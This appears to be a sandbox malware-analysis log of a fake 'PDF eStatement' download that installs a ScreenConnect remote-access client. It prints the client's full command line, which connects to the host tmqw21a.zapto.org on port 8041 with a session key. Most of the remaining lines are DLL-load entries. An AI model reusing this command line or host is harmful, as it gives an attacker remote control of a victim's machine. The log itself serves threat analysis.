                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3128 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe "C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe"
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7EE86E0B1933AB805D756378B6788F55 C
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI67F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5138515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 035924D4E1C9F612A4EFA7D56997A0B8
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5F4150FA748054945E832E08AD4D9221 E Global\MSI0000
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=tmqw21a.zapto.org&p=8041&s=2bb258fa-13a9-41c5-bd5b-67ab96b0c2b1&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&i=Amazon"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe "C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe"
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "4d74424a-3cf2-4271-8dfa-4faa9bc7cc7b" "User"
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7EE86E0B1933AB805D756378B6788F55 C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 035924D4E1C9F612A4EFA7D56997A0B8
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5F4150FA748054945E832E08AD4D9221 E Global\MSI0000
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI67F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5138515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "4d74424a-3cf2-4271-8dfa-4faa9bc7cc7b" "User"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: amsi.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: version.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: slc.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
